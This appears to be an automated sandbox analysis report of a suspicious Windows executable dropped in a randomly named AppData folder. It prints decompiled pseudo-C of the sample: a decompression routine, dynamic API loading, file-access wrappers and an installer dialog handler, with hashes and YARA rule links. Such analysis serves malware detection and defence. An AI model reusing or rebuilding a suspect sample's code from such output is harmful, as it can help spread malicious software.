											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00405753
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405753

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404772 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x75401c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x753e70
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x1
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x75401c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x759a19
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x754024
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x754034
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
